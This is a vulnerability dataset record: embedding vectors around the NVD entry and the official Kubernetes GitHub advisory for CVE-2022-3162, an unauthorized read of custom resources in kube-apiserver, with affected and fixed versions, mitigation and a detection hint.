0.011283786967396736, 0.01732034981250763, -0.020011618733406067, -0.031032294034957886, 0.011990432627499104, -0.004514266271144152, -0.0005694516003131866, 0.0001142896871897392, -0.005995216313749552, -0.008043739013373852, -0.0010458739707246423, 0.005514095537364483, 0.008171536028385162, 0.010336579754948616, 0.0035745773930102587, -0.00733709242194891, 0.003630958730354905, 0.009547241032123566, -0.005893730092793703, 0.025048352777957916, 0.014599010348320007, 0.021755682304501534, 0.0021143003832548857, -0.007863318547606468, 0.0026649583596736193, -0.022717924788594246, -0.01225354615598917, -0.018102170899510384, -0.007419785019010305, 0.0133285503834486, -0.004036904312670231, -0.023589955642819405, 0.02223680354654789, -0.010246369987726212, -0.019575603306293488, -0.0009697591885924339, -0.012073125690221786, 0.006134290713816881, -0.011110884137451649, 0.012997779995203018, 0.018357766792178154, 0.012524176388978958, -0.0015354519709944725, -0.024672476574778557, 0.005450197029858828, -0.0010101657826453447, 0.005168289877474308, -0.00005990518184262328, -0.0012582436902448535, 0.0029506238643079996, 0.010216300375759602, -0.0009561336482875049, -0.0009251239243894815, 0.002127456245943904, -0.026566890999674797, 0.016658809036016464, 0.021018965169787407, 0.012050572782754898, -0.006995045579969883, -0.016538528725504875, 0.00812643114477396, -0.004544336348772049, 0.012869982048869133, 0.011975398287177086, 0.0051119085401296616, -0.014786947518587112, -0.0048224846832454205, 0.005570476874709129, 0.026130875572562218, 0.010426790453493595, -0.01846301183104515, -0.016733983531594276, -0.003486246569082141, -0.015230481512844563, 0.006356057245284319, 0.005491543095558882, 0.006589100230485201, -0.014110371470451355, -0.02715325728058815, -0.009780284017324448, 0.0018652828875929117, 0.010810183361172676, -0.0015392107889056206, -0.003634717548266053, -0.010178712196648121, -0.013403725810348988, 0.001431146520189941, 0.0035670597571879625, -0.023499745875597, 0.007412267848849297, 0.028882283717393875, 0.008464719168841839, -0.008291816338896751, -0.024461986497044563, 0.015606356784701347, 0.011546899564564228, -0.020838545635342598, 0.005837348755449057, 0.011291304603219032, -0.0007785324123688042, 0.002700666431337595, -0.003995558246970177, -0.024176321923732758, 0.016553563997149467, -0.003491884795948863, 0.005487784277647734, -0.003905348014086485, 0.0023266703356057405, -0.020688194781541824, 0.01850811578333378, 0.002674355171620846, 0.03292670473456383, -0.0054426793940365314, 0.005927558988332748, -0.008524859324097633, 0.02703297697007656, -0.002867931267246604, 0.006547753699123859, -0.0013954383321106434, -0.0067883143201470375, 0.006138049066066742, 0.023830516263842583, -0.003116009058430791, 0.010757560841739178, 0.002681872807443142, 0.0014029558515176177, 0.005499060731381178, 0.0017675552517175674, 0.00007341321179410443, 0.01720006950199604, -0.0017844695830717683, 0.00986297708004713, 0.004055698402225971, 0.0327763557434082, 0.011313856579363346, -0.01514778845012188, -0.0027382541447877884, 0.01218588836491108, -0.02602562867105007, -0.005318640265613794, -0.020146934315562248, 0.00805877335369587, 0.0007451734854839742, 0.01502750813961029, -0.015591321513056755, -0.0007686656899750233, 0.015726637095212936, -0.008148984052240849, 0.005822313483804464, -0.010148642584681511, -0.03145327419042587, 0.011358962394297123, -0.002939347643405199, 0.0438421368598938, 0.015666496008634567, -0.016478387638926506, -0.012043056078255177, -0.006581582594662905, -0.0005934136570431292, 0.0030577483121305704, 0.02614590898156166, -0.028701864182949066, -0.018192380666732788, -0.011787460185587406, -0.004559371620416641, -0.0059989751316607, 0.0022345806937664747, 0.005743379704654217, 0.0006559030152857304, 0.004867589566856623, 0.010968050919473171, 0.003484367160126567, 0.008329404518008232, 0.019605673849582672, -0.012809841893613338, -0.004672134295105934, 0.0177714005112648, 0.014072784222662449, -0.00721305375918746, 0.03446028009057045, 0.019861269742250443, 0.022086452692747116, 0.009599863551557064, -0.020688194781541824, -0.001711173914372921, 0.02008679509162903, -0.00011035474017262459, -0.016703912988305092, -0.007066462188959122, -0.007367162499576807, 0.002142491051927209, 0.005987699143588543, 0.014290791936218739, -0.006010251585394144, 0.002822826150804758, -0.017651120200753212, 0.0001063023300957866, 0.01187766995280981, 0.007149154786020517, -0.0007475226884707808, 0.00044376819278113544, -0.015651462599635124, 0.00925405789166689, -0.000040847109630703926, 0.014501282013952732, 0.0001577503135195002, -0.016012301668524742, 0.014125406742095947, -0.010524517856538296, -0.025303948670625687, 0.012170853093266487, -0.018162311986088753, 0.0015645823441445827, 0.013899881392717361, 0.0025033317506313324, 0.0015786776784807444, 0.005484025459736586, 0.01553118135780096, 0.005683239549398422, -0.0014762516366317868, -0.01706475391983986, 0.003649752587080002, -0.012366308830678463, -0.002909277565777302, -0.016177687793970108, -0.011584487743675709, -0.002371775219216943, 0.0037080133333802223, -0.012742184102535248, 0.006412438582628965, -0.0019376389682292938, 0.007145395968109369, 0.021785752847790718, 0.00799863412976265, 0.05406595394015312, -0.0005445498391054571, -0.0011586366454139352, 0.019229797646403313, -0.015373313799500465, -0.002005296526476741, -0.015952162444591522, -0.009802836924791336, -0.007592687848955393, 0.022206733003258705, 0.004642064217478037, 0.00540133286267519, 0.02847633883357048, 0.00535246916115284, -0.006995045579969883, 0.010035879909992218, 0.005055527202785015, -0.0024319153744727373, 0.014944816008210182, -0.003396036336198449, 0.0049615586176514626, -0.008803007192909718, -0.01514778845012188, 0.00838202703744173, 0.002155646914616227, 0.018357766792178154, 0.026852555572986603, 0.005382539238780737, 0.006104220636188984, 0.019951479509472847, 0.01215581875294447, 0.0030596277210861444, 0.015358278527855873, 0.0007616180228069425, -0.0002760336792562157, 0.01631300337612629, 0.011073296889662743, -0.0015861951978877187, 0.008224159479141235, -0.002266530180349946, -0.014786947518587112, 0.006528960075229406, 0.021815821528434753, -0.006025286391377449, -0.0014762516366317868, 0.019320007413625717, -0.016523493453860283, -0.00111071253195405, -0.007269435096532106, 0.010261405259370804, 0.013726978562772274, -0.011313856579363346, 0.0020165727473795414, -0.015065095387399197, -0.00437519233673811, 0.02897249534726143, -0.01521544624119997, 0.010629762895405293, -0.011817529797554016, -0.005859901197254658, 0.015771742910146713, -0.030160261318087578, 0.00938937347382307, -0.0038245345931500196, -0.01644831895828247, -0.00039584405021741986, -0.006457543466240168, -0.0053299167193472385, -0.013569111004471779, -0.01858329214155674, -0.00009385144949192181, 0.017936784774065018, 0.019816163927316666, -0.0166888777166605, 0.001686741947196424, 0.010667351074516773, -0.0189591683447361, -0.021875962615013123, 0.02172561176121235, 0.003123526694253087, 0.0010045276721939445, -0.003536989912390709, 0.017124895006418228, -0.011825047433376312, 0.017966855317354202, -0.006341021973639727, 0.0030351958703249693, -0.01808713562786579, -0.0007155732600949705, -0.008960875682532787, -0.01840287074446678, -0.011524347588419914, 0.010336579754948616, 0.006145566701889038, 0.008329404518008232, -0.048412781208753586, 0.0007296685944311321, 0.013283445499837399, -0.00863010436296463, 0.01307295449078083, -0.002751409774646163, -0.010329063050448895, 0.010930463671684265, -0.015546216629445553, 0.013659320771694183, 0.003818896599113941, 0.006837178021669388, -0.010073467157781124, 0.014418589882552624, -0.0030878183897584677, 0.0267623458057642, -0.0337686687707901, 0.01383222360163927, 0.009028532542288303, 0.010186229832470417, 0.03274628520011902, 0.005916282534599304, -0.003121647285297513, 0.007179224863648415, 0.009261575527489185, -0.007562617771327496, 0.011727320030331612, -0.013103025034070015, 0.007073979824781418, 0.011599522083997726, -0.0033227407839149237, -0.006382368505001068, -0.017545875161886215, 0.001707415096461773, 0.0004726636107079685, -0.004548095166683197, -0.020372459664940834, -0.0031573553569614887, -0.00212557683698833, 0.02401093579828739, 0.0008771998109295964, -0.001848368439823389, 0.022071417421102524, 0.009404408745467663, 0.01680915802717209, 0.003258841810747981, -0.015192893333733082, 0.005055527202785015, -0.011546899564564228, 0.0033885189332067966, -0.015268068760633469, 0.007938493974506855, -0.042609263211488724, -0.00300888461060822, 0.0009044507751241326, -0.002332308329641819, -0.009592346847057343, 0.011441654525697231, 0.010629762895405293, 0.0050780801102519035, -0.0043526398949325085, -0.007551341783255339, 0.004089526832103729, 0.013133094646036625, -0.003480608342215419, 0.009163848124444485, 0.01581684686243534, 0.017410559579730034, 0.014847087673842907, 0.0010242611169815063, -0.0055629597045481205, -0.013809670694172382, 0.006577823776751757, 0.007825731299817562, 0.0022514951415359974, -0.022086452692747116, -0.005160772707313299, -0.018237486481666565, -0.0008001452661119401, -0.012095678597688675, 0.020808475092053413, 0.005750897340476513, -0.000032448639103677124, -0.00056710239732638, 0.0033133437391370535, -0.017545875161886215, 0.002514607971534133, 0.0032719974406063557, 0.010892876423895359, -0.008457201533019543, -0.013095507398247719, -0.008066290989518166, -0.007694174535572529, -0.012621903792023659, 0.05078831687569618, 0.009517171420156956, 0.004213565960526466, -0.006720656529068947, -0.013531522825360298, -0.0054614730179309845, -0.015786776319146156, -0.001962070818990469, -0.025589613243937492, 0.02154519222676754, -0.021590296179056168, -0.00787835381925106, 0.015087648294866085, 0.005123184993863106, 0.010073467157781124, 0.007694174535572529, -0.001018623006530106, 0.006498889997601509, -0.018688537180423737, -0.012832394801080227, -0.011937810108065605, -0.005927558988332748, 0.04567640647292137, -0.025875279679894447, 0.01130633894354105, -0.010193747468292713, 0.01442610751837492, -0.011336409486830235, 0.00393917690962553, -0.0058298311196267605, 0.016703912988305092, -0.013711943291127682, -0.005671963561326265, -0.005457714200019836, -0.003531351685523987, 0.006536477245390415, 0.022387152537703514, 0.025800103321671486, -0.015260551124811172, -0.022251838818192482, 0.0028021528851240873, 0.017876645550131798, -0.007773108314722776, -0.011471725068986416, -0.004209807142615318, 0.01105826161801815, -0.013524005189538002, 0.004901418462395668, 0.011622074991464615, 0.012704596854746342, 0.013922433368861675, 0.01077259611338377, -0.017109859734773636, 0.009163848124444485, -0.000521057634614408, 0.00932171568274498, 0.01492978073656559, -0.03364838659763336, -0.00027626860537566245, -0.014178029261529446, -0.0034073127899318933, -0.019740989431738853, -0.010509482584893703, -0.015831882134079933, -0.020177004858851433, -0.010479412972927094, 0.021003931760787964, 0.009735179133713245, -0.007558859419077635, 0.02966410666704178, 0.015486076474189758, 0.004525542724877596, -0.01775636523962021, -0.004875107202678919, -0.002409362932667136, -0.02916795015335083, 0.020116863772273064, 0.0008259867317974567, 0.005288570187985897, -0.014576457440853119, 0.0025559542700648308, -0.015395866706967354, 0.01852315105497837, -0.0035388690885156393, 0.00030868788599036634, -0.008652657270431519, 0.005645652301609516, -0.004833760671317577, -0.0014405434485524893, 0.02298855409026146, 0.026476681232452393, 0.027378782629966736, 0.0013550317380577326, -0.003377242712303996, 0.019861269742250443, 0.02065812610089779, 0.008321886882185936, -0.011674697510898113, 0.0027645654045045376, 0.015162823721766472, 0.011990432627499104, -0.0018182984786108136, -0.025288913398981094, 0.003931659273803234, 0.005762173794209957, -0.010945498943328857, 0.013343585655093193, -0.021079106256365776, -0.006735691335052252, 0.017470700666308403, 0.02607073448598385, -0.0018521272577345371, -0.002080471720546484, 0.0013757048873230815, 0.02381548099219799, -0.0017910473980009556, 0.024236461147665977, 0.00697625195607543, 0.02085358090698719, -0.002796514891088009, 0.007434820290654898, 0.009494618512690067, 0.03491133078932762, 0.004506749100983143, -0.004051939584314823, -0.018432941287755966, 0.01442610751837492, 0.015283104032278061, 0.008351956494152546, -0.01297522708773613, 0.003048351500183344, -0.008998462930321693, 0.03936169669032097, 0.015019990503787994, 0.005235947668552399, 0.02569485828280449, -0.022838203236460686, 0.02948368526995182, 0.013418760150671005, -0.013779601082205772, -0.001204681466333568, 0.03773791342973709, -0.001825815881602466, 0.007577653042972088, -0.021635401993989944, 0.0019376389682292938, -0.0004801811301149428, 0.009366821497678757, -0.007825731299817562, -0.016613703221082687, 0.013493935577571392, 0.0065552713349461555, 0.005517854355275631, -0.0075438241474330425, -0.0011210490483790636, 0.006002733949571848, 0.010005809366703033, 0.024612337350845337, -0.012832394801080227, -0.005273535382002592, -0.01814727671444416, 0.025424228981137276, -0.0035689391661435366, -0.010186229832470417, 0.01840287074446678, 0.014937298372387886, 0.02405604161322117, 0.0010797027498483658, 0.0007014779257588089, -0.0077806259505450726, -0.027108151465654373, -0.015696566551923752, 0.012433966621756554, -0.016673844307661057, 0.011358962394297123, 0.018914062529802322, 0.0327763557434082, -0.0043413639068603516, 0.008171536028385162, -0.0020973861683160067, 0.01732034981250763, 0.0004212156345602125, -0.041105762124061584, 0.0019103880040347576, 0.01414044201374054, -0.004066974390298128, 0.011599522083997726, -0.020883651450276375, 0.029017599299550056, -0.00824671145528555, -0.0031742698047310114, -0.0013710063649341464, 0.007363403681665659, -0.018312660977244377, -0.007953528314828873, 0.016478387638926506, 0.015410901047289371, 0.0067056212574243546, 0.01744063012301922, -0.004416538868099451, 0.013561593368649483, -0.017290279269218445, -0.012900051660835743, 0.010005809366703033 ]
CVE-2022-3162
2023-03-01T19:15:25.457000
Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true: 1. There are 2+ CustomResourceDefinitions sharing the same API group 2. Users have cluster-wide list or watch authorization on one of those custom resources. 3. The same users are not authorized to read another custom resource in the same API group.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/113756" }, { "source": "[email protected]", "tags": [ "Mailing List", "Vendor Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/iUd550j7kjA" }, { "source": "[email protected]", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230511-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "1780A92B-C6FB-410B-8374-88D1D296816A", "versionEndExcluding": null, "versionEndIncluding": "1.22.15", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "A09EA928-A8A1-4CEC-A16F-AD65BD31A9D4", "versionEndExcluding": null, "versionEndIncluding": "1.23.13", "versionStartExcluding": null, "versionStartIncluding": "1.23.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DDE00AE9-4CCC-49AA-B5D4-80A6FAE0FCB1", "versionEndExcluding": null, "versionEndIncluding": "1.24.7", "versionStartExcluding": null, "versionStartIncluding": "1.24.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "A01548FA-CE9A-4ACB-8AC5-C85F16BC134B", "versionEndExcluding": null, "versionEndIncluding": "1.25.3", "versionStartExcluding": null, "versionStartIncluding": "1.25.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/113756
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) A security issue was discovered in Kubernetes where users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. ### Am I vulnerable? Clusters are impacted by this vulnerability if all of the following are true: - There are 2+ CustomResourceDefinitions sharing the same API group - Users have cluster-wide list or watch authorization on one of those custom resources. - The same users are not authorized to read another custom resource in the same API group. #### Affected Versions - Kubernetes kube-apiserver <= v1.25.3 - Kubernetes kube-apiserver <= v1.24.7 - Kubernetes kube-apiserver <= v1.23.13 - Kubernetes kube-apiserver <= v1.22.15 ### How do I mitigate this vulnerability? Upgrading the kube-apiserver to a fixed version mitigates this vulnerability. Prior to upgrading, this vulnerability can be mitigated by avoiding granting cluster-wide list and watch permissions. #### Fixed Versions - Kubernetes kube-apiserver v1.25.4 - Kubernetes kube-apiserver v1.24.8 - Kubernetes kube-apiserver v1.23.14 - Kubernetes kube-apiserver v1.22.16 ### Detection Requests containing `..` in the request path are a likely indicator of exploitation. Request paths may be captured in API audit logs, or in kube-apiserver HTTP logs. If you find evidence that this vulnerability has been exploited, please contact [email protected] #### Acknowledgements This vulnerability was reported by Richard Turnbull of NCC Group as part of the Kubernetes Audit. <!-- labels --> /area security /kind bug /committee security-response /label official-cve-feed /sig api-machinery /area apiserver
CVE-2022-3162: Unauthorized read of Custom Resources
https://api.github.com/repos/kubernetes/kubernetes/issues/113756/comments
17
2022-11-08T21:33:07
2022-12-08T03:40:09Z
https://github.com/kubernetes/kubernetes/issues/113756
1,440,934,711
113,756
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2022-3162: Unauthorized read of Custom Resources Issue date: --- start body --- CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) A security issue was discovered in Kubernetes where users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. ### Am I vulnerable? Clusters are impacted by this vulnerability if all of the following are true: - There are 2+ CustomResourceDefinitions sharing the same API group - Users have cluster-wide list or watch authorization on one of those custom resources. - The same users are not authorized to read another custom resource in the same API group. #### Affected Versions - Kubernetes kube-apiserver <= v1.25.3 - Kubernetes kube-apiserver <= v1.24.7 - Kubernetes kube-apiserver <= v1.23.13 - Kubernetes kube-apiserver <= v1.22.15 ### How do I mitigate this vulnerability? Upgrading the kube-apiserver to a fixed version mitigates this vulnerability. Prior to upgrading, this vulnerability can be mitigated by avoiding granting cluster-wide list and watch permissions. #### Fixed Versions - Kubernetes kube-apiserver v1.25.4 - Kubernetes kube-apiserver v1.24.8 - Kubernetes kube-apiserver v1.23.14 - Kubernetes kube-apiserver v1.22.16 ### Detection Requests containing `..` in the request path are a likely indicator of exploitation. Request paths may be captured in API audit logs, or in kube-apiserver HTTP logs. If you find evidence that this vulnerability has been exploited, please contact [email protected] #### Acknowledgements This vulnerability was reported by Richard Turnbull of NCC Group as part of the Kubernetes Audit. <!-- labels --> /area security /kind bug /committee security-response /label official-cve-feed /sig api-machinery /area apiserver --- end body ---
2,072
[ 0.007913695648312569, -0.023044239729642868, -0.008348362520337105, 0.017717845737934113, 0.024396536871790886, -0.01124614104628563, -0.0004143995756749064, 0.02703213505446911, 0.023044239729642868, 0.017414269968867302, 0.0092038968577981, 0.0007731721852906048, 0.012446649372577667, 0.013253887183964252, 0.023237423971295357, 0.05894909426569939, -0.02108478918671608, 0.0003779617545660585, -0.009065907448530197, 0.011625612154603004, -0.00918319821357727, 0.01982908509671688, -0.004543303046375513, 0.04404623433947563, 0.017179686576128006, 0.00421212799847126, -0.00839665811508894, 0.0007770531228743494, -0.05356750637292862, 0.016669126227498055, 0.03905101493000984, 0.01795242913067341, 0.013805844821035862, 0.025500452145934105, 0.04443260654807091, -0.012315559200942516, 0.005129758268594742, 0.03797470033168793, -0.03706396743655205, -0.041534826159477234, -0.03949258103966713, -0.06717326492071152, 0.0027822123374789953, 0.03182036802172661, -0.0017654026160016656, -0.005643768701702356, -0.017221083864569664, -0.033365849405527115, -0.012626035138964653, 0.028011860325932503, -0.02961253747344017, -0.03383501619100571, -0.06800120323896408, -0.06998825073242188, 0.018504386767745018, -0.01684851199388504, 0.011694606393575668, 0.01998087391257286, 0.012025780975818634, 0.0034255883656442165, 0.015592808835208416, 0.015813590958714485, 0.021457361057400703, 0.02991611510515213, -0.0008352674194611609, 0.02148495800793171, -0.037864308804273605, 0.032510317862033844, -0.04479137808084488, 0.016227560117840767, -0.0025045087095350027, 0.0014488892629742622, 0.0030547415371984243, 0.0015929157380014658, 0.02870180644094944, 0.006809779908508062, 0.041093260049819946, 0.03830587491393089, -0.0037671122699975967, 0.027404706925153732, -0.017428068444132805, 0.03146159648895264, -0.0034894084092229605, 0.00005524968582903966, 0.03706396743655205, 0.005705864168703556, -0.06479985266923904, -0.07501106709241867, 0.0006826166063547134, -0.01064588688313961, -0.016172364354133606, 0.029032981023192406, 0.009417780674993992, -0.03855425491929054, 0.03687078133225441, -0.009893843904137611, 0.0025010588578879833, -0.033062275499105453, -0.025900620967149734, 0.010507897473871708, -0.03678799048066139, 0.02919856831431389, -0.002564879134297371, -0.012281062081456184, 0.039520181715488434, 0.008596743457019329, -0.024879498407244682, 0.02214730717241764, -0.01952550746500492, 0.11878132820129395, 0.004477757960557938, 0.007451430894434452, -0.028867393732070923, -0.007720510009676218, -0.029281362891197205, 0.029474547132849693, -0.013516067527234554, -0.0021767837461084127, -0.05307074636220932, -0.03651200979948044, -0.029446950182318687, -0.012481146492064, 0.01447509415447712, -0.012660532258450985, -0.046392057090997696, 0.02925376407802105, -0.010369908064603806, -0.0009736880892887712, -0.027625489979982376, -0.0016317253466695547, 0.005547176115214825, -0.0006778732058592141, -0.03419378772377968, -0.024120556190609932, -0.02028444968163967, 0.013543665409088135, 0.0002792130399029702, 0.03775391727685928, 0.024948494508862495, -0.013909337110817432, -0.018297402188181877, -0.018794164061546326, -0.004619196988642216, 0.0006757171358913183, -0.02102959342300892, 0.016724321991205215, 0.008486351929605007, -0.0069684674963355064, -0.0007731721852906048, -0.016669126227498055, 0.0209330003708601, 0.0032548264134675264, 0.027459902688860893, 0.024272345006465912, 0.05784517899155617, -0.02410675771534443, 0.02689414471387863, 0.006409610155969858, 0.009928341023623943, 0.01749706268310547, 0.020256852731108665, -0.005830054637044668, 0.001981873530894518, -0.02174713835120201, 0.039575375616550446, 0.010383706539869308, 0.009086606092751026, 0.01745566539466381, -0.030688855797052383, 0.016324153169989586, 0.003977546002715826, -0.04495696350932121, 0.03182036802172661, -0.014695877209305763, -0.031709976494312286, -0.017828237265348434, 0.036291226744651794, 0.01650353893637657, 0.0026183498557657003, -0.016420746222138405, 0.0014721750048920512, 0.04081728309392929, -0.03140639886260033, -0.023885974660515785, 0.02249228209257126, -0.016434544697403908, -0.0051504564471542835, 0.014364702627062798, -0.011991283856332302, -0.008244870230555534, -0.010356108658015728, 0.003891302738338709, 0.008969314396381378, -0.008065483532845974, -0.0449017696082592, 0.031240813434123993, 0.007913695648312569, -0.0333106555044651, 0.046033281832933426, 0.011556616984307766, 0.017980026081204414, 0.009017610922455788, -0.020353445783257484, 0.025666039437055588, -0.022975245490670204, 0.021816132590174675, 0.02275446057319641, -0.018338799476623535, 0.02087780460715294, -0.025183076038956642, -0.08538787811994553, -0.02234049327671528, 0.03107522614300251, 0.011894690804183483, 0.02583162672817707, 0.007610118482261896, 0.0038016096223145723, 0.006726985797286034, -0.04150722920894623, 0.0009943865006789565, 0.04368746280670166, -0.06380632519721985, 0.030688855797052383, 0.012626035138964653, -0.04559171572327614, -0.0043501174077391624, 0.012143072672188282, 0.0008007700671441853, -0.013681654818356037, -0.029722929000854492, 0.023044239729642868, -0.016682924702763557, -0.011791199445724487, 0.018242206424474716, -0.005709313787519932, -0.028108451515436172, 0.01174980215728283, 0.007444531191140413, -0.0018973550759255886, -0.008658838458359241, 0.0024544873740524054, -0.017041698098182678, -0.009003812447190285, -0.01170150563120842, -0.01614476554095745, 0.024493128061294556, -0.0035497788339853287, 0.03151679039001465, -0.014123220928013325, 0.03949258103966713, -0.033421047031879425, 0.04462578892707825, -0.005467832088470459, -0.0009228044655174017, 0.001068555866368115, -0.02936415560543537, -0.022161107510328293, 0.03364183008670807, 0.01584118977189064, -0.004753736779093742, 0.038775037974119186, 0.005302244797348976, -0.04272153601050377, 0.016158565878868103, 0.03394540771842003, 0.0069684674963355064, 0.0030219689942896366, 0.008300065994262695, -0.006495853886008263, -0.02043623849749565, 0.005723112728446722, 0.000787833530921489, -0.01301240548491478, -0.0026614717207849026, 0.008555346168577671, -0.0035601279232650995, 0.023830778896808624, 0.026107605546712875, 0.007824001833796501, -0.025459054857492447, 0.0027873869985342026, -0.030385278165340424, 0.013447072356939316, -0.01190159097313881, 0.003244477091357112, 0.0027735880576074123, -0.03571167215704918, -0.06987786293029785, 0.0025666039437055588, -0.026769954711198807, -0.026204198598861694, -0.009376383386552334, -0.0290053840726614, 0.020767413079738617, -0.02102959342300892, 0.01680711656808853, -0.005078012123703957, 0.0237065888941288, -0.028674209490418434, -0.01314349565654993, -0.021402165293693542, 0.009445378556847572, -0.00005263543062028475, 0.012881316244602203, -0.024272345006465912, 0.029336558654904366, -0.004436361137777567, 0.042997512966394424, -0.029419351369142532, -0.011384130455553532, -0.018242206424474716, -0.023113233968615532, -0.0084518538787961, -0.012005082331597805, -0.03678799048066139, 0.03736754506826401, 0.028977785259485245, 0.006965017877519131, 0.028260240331292152, -0.005429885350167751, 0.020408641546964645, 0.012274161912500858, -0.047799546271562576, 0.01046650018543005, -0.0038326571229845285, -0.0444050058722496, -0.017717845737934113, 0.0008037886000238359, -0.03469054773449898, 0.0029133025091141462, -0.007368636783212423, 0.007837801240384579, -0.02997131086885929, -0.015758395195007324, -0.02537626028060913, -0.031958356499671936, -0.0046260966919362545, -0.02260267361998558, 0.013350480236113071, -0.015178840607404709, -0.022920049726963043, 0.0030064452439546585, -0.015123644843697548, 0.021871328353881836, 0.008520849049091339, -0.004695091396570206, -0.015358226373791695, 0.0017015824560075998, 0.018725169822573662, -0.006695938296616077, 0.0007908520638011396, 0.0262317955493927, -0.023582398891448975, 0.0036636199802160263, 0.02461731992661953, 0.023292619735002518, -0.02305803820490837, -0.019994672387838364, 0.039823755621910095, -0.0019008048111572862, 0.037091564387083054, -0.057679593563079834, -0.00912800244987011, 0.033172667026519775, -0.006620044354349375, -0.022409487515687943, 0.0045502022840082645, 0.045426130294799805, -0.023140832781791687, -0.01886315830051899, -0.05083531513810158, -0.007230647373944521, 0.02022925391793251, 0.01395073439925909, -0.03021969087421894, -0.050172965973615646, -0.03046807274222374, 0.023623794317245483, -0.018035221844911575, 0.026052409783005714, -0.030633660033345222, 0.017069295048713684, 0.008686436340212822, -0.018642375245690346, 0.028536219149827957, 0.03308987244963646, 0.029088176786899567, 0.027156325057148933, 0.004281122703105211, -0.003556678304448724, -0.04962100833654404, 0.10376807302236557, 0.005974943283945322, -0.015027051791548729, -0.0029409003909677267, 0.0018749317387118936, -0.019994672387838364, -0.012943411245942116, 0.023016640916466713, -0.004115535411983728, 0.00693741999566555, 0.031654782593250275, -0.015620406717061996, 0.04887586459517479, -0.015551411546766758, 0.02541765756905079, 0.00619227671995759, -0.018173212185502052, -0.004032741766422987, -0.01996707357466221, -0.00842425599694252, 0.0014945983421057463, -0.029584938660264015, 0.006561398506164551, 0.02723911963403225, 0.08091701567173004, 0.06148810312151909, 0.019635898992419243, -0.005685165524482727, 0.023775583133101463, 0.003774011740460992, -0.007416933309286833, 0.04423942044377327, 0.026811351999640465, -0.0035980751272290945, 0.04065169394016266, 0.0011901591205969453, 0.014640681445598602, 0.03071645274758339, -0.01124614104628563, -0.010908066295087337, 0.018200809136033058, 0.021650545299053192, 0.0058266050182282925, -0.002814984880387783, -0.00693741999566555, -0.01384724210947752, -0.04230756685137749, 0.027625489979982376, -0.014806268736720085, -0.017593655735254288, 0.00495727127417922, -0.04515014961361885, 0.015592808835208416, -0.016572533175349236, -0.022630270570516586, -0.03140639886260033, -0.009997336193919182, -0.055057793855667114, -0.05171844735741615, -0.05210481956601143, -0.014764871448278427, -0.028370631858706474, 0.001044407719746232, -0.016876110807061195, 0.016434544697403908, 0.020187856629490852, -0.028729405254125595, 0.03651200979948044, 0.023127032443881035, -0.0006739922682754695, 0.01700030080974102, -0.026852747425436974, -0.014157718047499657, 0.020753614604473114, 0.018904555588960648, -0.027252918109297752, -0.022257698699831963, 0.022312894463539124, -0.012439749203622341, 0.0209330003708601, 0.024189552292227745, 0.01811801642179489, 0.011549717746675014, -0.02038104273378849, 0.03071645274758339, 0.03267590329051018, 0.006837377790361643, -0.03618083521723747, -0.0036153236869722605, -0.004864128306508064, 0.01876656524837017, 0.018987350165843964, 0.02134696952998638, -0.006357864011079073, -0.03474574536085129, -0.0008154314709827304, 0.004467408638447523, -0.02864661067724228, -0.010459600947797298, 0.03314506635069847, 0.0017378047341480851, -0.007347938604652882, -0.042804330587387085, 0.01453028991818428, 0.016724321991205215, -0.010197420604526997, -0.012239664793014526, 0.06590376794338226, -0.007775705773383379, 0.031158018857240677, 0.008976214565336704, 0.010845971293747425, -0.02133316919207573, -0.020767413079738617, -0.03466295078396797, -0.04887586459517479, 0.028839796781539917, -0.011598014272749424, -0.0005122858565300703, -0.007140954490751028, -0.011894690804183483, 0.015675602480769157, -0.0074583301320672035, 0.004998668096959591, -0.018932154402136803, 0.03502172231674194, -0.008258668705821037, 0.00993524119257927, 0.01125304028391838, 